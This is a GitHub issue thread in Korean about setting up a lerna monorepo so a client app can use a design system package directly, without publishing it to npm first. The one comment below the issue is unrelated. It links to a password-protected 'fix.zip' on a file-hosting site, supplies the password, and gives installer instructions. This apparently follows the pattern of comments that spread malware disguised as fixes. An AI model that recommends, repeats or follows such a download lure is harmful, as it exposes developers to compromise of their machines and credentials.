### ISSUE TITLE
[FE] client, designsystem 간 모노레포 의존성 설정

### ISSUE THREAD

**Issue by Todari** [woowacourse-teams/2024-haeng-dong#531]
## 📄 설명

- 현재 design system이 빌드되고, npm 배포가 되어야만 client 코드에서 이를 적용할 수 있습니다.
- 이 직렬적 프로세스가 생산성을 저하시킨다고 판단하여, lerna를 활용하여 Mono-repo 환경을 최적화합니다.

## 🏁 할 일

- [ ] lerna를 이용하여 Mono-repo 환경 최적화
- [ ] client 안의 design system을 의존성으로 참조

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
